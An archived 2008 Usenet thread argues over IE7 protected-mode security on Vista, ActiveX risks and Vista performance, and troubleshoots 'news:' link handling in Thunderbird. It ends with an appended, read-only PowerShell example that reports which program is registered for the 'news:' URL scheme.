> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
> exploits fast enough.


IE7 on Vista runs in protected mode and is the most secure browser there
is because of it. Unless of course you run something like OB1 that
doesn't support any scripting at all. Because of your hostile attitude
and lack of objectivity I must end our conversation because you are not
worth my time and are a nasty bullshitter. I hope others are smart
enough to see you for what you really are.

Sebastian G.
03-31-08, 12:51 PM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
>> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
>> exploits fast enough.
>
>
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.


Nonsense. IE by itself is as easy to compromise as ever, and breaking out of
the protected mode is trivial[1][2].

> Because of your hostile attitude
> and lack of objectivity I must end our conversation because you are not
> worth my time and are a nasty bullshitter. I hope others are smart
> enough to see you for what you really are.

One should rather hope that others are smart enough to not fall for your
obviously ridiculous claims about others.

[1] http://uninformed.org/?v=8&a=6&t=sumry
[2] http://blogs.technet.com/markrussinovich/archive/2007/02/12/638372.aspx

Volker Birk
04-01-08, 12:36 AM
Rat River Cemetary <dead@rat.here> wrote:
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.

Unless IE stops supporting ActiveX and thus supporting manipulating
arbitrary COM objects, it's a security nightmare and not "the most
secure browser".

ActiveX is a design flaw, and never can be fixed.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Rat River Cemetary
04-01-08, 06:23 AM
Volker Birk wrote:

> Unless IE stops supporting ActiveX and thus supporting manipulating
> arbitrary COM objects, it's a security nightmare and not "the most
> secure browser".
>
> ActiveX is a design flaw, and never can be fixed.
>
> Yours,
> VB.

I use FF with NoScript but nothing can compromise the OS by running IE7
because it runs in protected memory space.

Sebastian G.
04-01-08, 06:48 AM
Rat River Cemetary wrote:


> I use FF with NoScript but nothing can compromise the OS by running IE7
> because it runs in protected memory space.


Unless you simply break out of it, which is trivial.

Volker Birk
04-01-08, 07:25 AM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> Unless IE stops supporting ActiveX and thus supporting manipulating
>> arbitrary COM objects, it's a security nightmare and not "the most
>> secure browser".
>> ActiveX is a design flaw, and never can be fixed.
> I use FF with NoScript but nothing can compromise the OS by running IE7
> because it runs in protected memory space.

That's wrong.

COM offers the possibility for IPC (DCOM, COM+).

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

goarilla@work
04-02-08, 06:17 AM
Sebastian G. wrote:
> Q wrote:
>
>> Sebastian G. wrote:
>>
>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>
>> Is that your email address and news should be mail?
>
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?
>
Thunderbird doesn't understand it either.

Sebastian G.
04-02-08, 07:03 AM
goarilla@work wrote:

> Sebastian G. wrote:
>> Q wrote:
>>
>>> Sebastian G. wrote:
>>>
>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>> Is that your email address and news should be mail?
>>
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>>
> Thunderbird doesn't understand it either.


Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
"news:" is broken?

Rat River Cemetary
04-02-08, 03:23 PM
Sebastian G. wrote:

> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

I use portable Thunderbird for news so it is not registered in the
registry as my news reader. When I clicked your link Microsoft Mail
tried to open it because that is what is registered on my system for
news but I only use that for Mail and not news. You should not assume
everyone has their PC configured the same as you.

Sebastian G.
04-02-08, 03:25 PM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> I use portable Thunderbird for news so it is not registered in the
> registry as my news reader. When I clicked your link Microsoft Mail
> tried to open it because that is what is registered on my system for
> news but I only use that for Mail and not news. You should not assume
> everyone has their PC configured the same as you.


Now it's my fault that you didn't set it up properly... "news:" is one of
the few well known protocol handlers which one may safely assume to be working.

Even further, it's the standard way of referencing Usenet postings. Even
further, there simply is no other.

Dave
04-03-08, 03:04 AM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:
> Sebastian G. wrote:
>> quodnomentibi@remailed.ws wrote:
>>
>>
>>> I just got a new laptop a few days ago, running Vista Home Premium.
>>> I am
>>> in the midst of "customizing" it. Presently, I am running the Microsoft
>>> Firewall. Is this an act of blind faith on my part.
>>
>>
>> Yes. Windows Vista is trivially insecure.


Personally I think a hardware firewall is well worth having. Mine only
allows out the ports I want, and some like lookups to DNS servers and
time servers are only allowed to certain IP addresses.

I don't know how insecure Vista is (I've personally not been knowingly
hacked), but I do agree it is a poor operating system. I had Vista
Business supplied on my high end laptop, then paid for an upgrade to
Vista Ultimate. I've since repartitioned the disk to Solaris x86, but
I'm going to fit a larger disk (300 GB from 120 GB), and then partition
as XP and Solaris x86.

So despite having Vista Ultimate, on a laptop which costs about $3200
only 13 months ago (dual core 2 GHz, 2 GB RAM), I have come to the
conclusion it requires too much resources from my high-end laptop.

You really should try Solaris x86 and see how snappy a machine feels
compared to one running Vista. I've not managed to get drivers for
either the camera or the fingerprint reader, but those are minor
irritations compared to the slowness of Vista and the fact many programs
have issues when running under Vista.

Sebastian G.
04-03-08, 04:58 AM
Dave wrote:


> You really should try Solaris x86 and see how snappy a machine feels
> compared to one running Vista. I've not managed to get drivers for
> either the camera or the fingerprint reader, but those are minor
> irritations compared to the slowness of Vista and the fact many programs
> have issues when running under Vista.


This fact is, sadly, well documented. With Windows 2000 Microsoft decided on
a subset of the Win32 API known as NT5 API, which they guaranteed to keep
consistent on all Windows versions till at least 2012, and strongly advised
all newly developed programs to restrict themselves to this subset for the
sake of forward and backward compatibility. Now with Vista they've already
broken this promise, e.g. they've removed the ShellItemIDList stuff and
fully replaced it with Windows Search 4.0 Item Containers (and didn't even
offer a marshaller stub, which would be trivial to implement).

goarilla@work
04-07-08, 09:47 AM
Sebastian G. wrote:
> goarilla@work wrote:
>
>> Sebastian G. wrote:
>>> Q wrote:
>>>
>>>> Sebastian G. wrote:
>>>>
>>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>>> Is that your email address and news should be mail?
>>>
>>> No, it's a reference to one of my postings in this thread. Is your
>>> newsreader that defective?
>>>
>> Thunderbird doesn't understand it either.
>
>
> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

Maybe ... but well ...
How do I check?

Tried looking in HKCR\... for news:/
but damn,
I miss mailcap?

Sebastian G.
04-07-08, 12:40 PM
goarilla@work wrote:


>>> Thunderbird doesn't understand it either.
>>
>> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> Maybe ... but well ...
> How do I check?
>
> Tried looking in HKCR\... for news:/
> but damn,
> I miss mailcap?


On Windows it should be HKCR\news, entitled as "URL:News Protocol" and "URL
Protocol", and the "open" shell verb gives the handler.

However, it is well known that both Thunderbird and Mozilla Mail don't set
this properly when installed and running without admin privileges, so you
have to do it manually.
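As an added example (not code from the thread or from any of the posters), a PowerShell check of the registration Sebastian describes: it reads HKCR\news and, in addition, the per-user hive HKCU\Software\Classes (where an install done without admin rights would have to register itself), reports whether the "URL Protocol" marker is present, and shows which command the "open" shell verb launches. The function name and the `$Scheme` parameter are my own choices.

```powershell
# Added example: report which program is registered to handle "news:" URLs.
# HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes;
# the per-user hive is checked separately so a non-admin registration is visible.
function Get-NewsProtocolHandler {
    [CmdletBinding()]
    param([string]$Scheme = 'news')   # scheme name as it appears under HKCR

    $roots = @(
        "Registry::HKEY_CLASSES_ROOT\$Scheme",
        "Registry::HKEY_CURRENT_USER\Software\Classes\$Scheme"
    )
    foreach ($root in $roots) {
        if (-not (Test-Path -LiteralPath $root)) {
            [pscustomobject]@{ Key = $root; Registered = $false; Command = $null; ExeExists = $null }
            continue
        }
        $key = Get-Item -LiteralPath $root
        # A URL scheme key must carry a value named "URL Protocol" (normally empty);
        # without it the shell does not treat the key as a protocol handler.
        $isUrl = $null -ne $key.GetValue('URL Protocol', $null)

        # The "open" verb's default value is the command line the shell runs.
        $cmdKey = "$root\shell\open\command"
        $cmd = (Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue).'(default)'

        $exe = $null
        if ($cmd) {
            # Executable is the quoted first token, or the first word if unquoted.
            if ($cmd -match '^"([^"]+)"') { $exe = $Matches[1] } else { $exe = ($cmd -split '\s+')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)
        }
        [pscustomobject]@{
            Key        = $root
            Registered = $isUrl
            Command    = $cmd
            ExeExists  = if ($exe) { Test-Path -LiteralPath $exe } else { $null }
        }
    }
}

Get-NewsProtocolHandler | Format-List
```

If the Command field points at a mail client rather than the newsreader you actually use (the situation described earlier in the thread), that is the key to change, and a missing per-user entry is what you would expect after a portable or non-admin install.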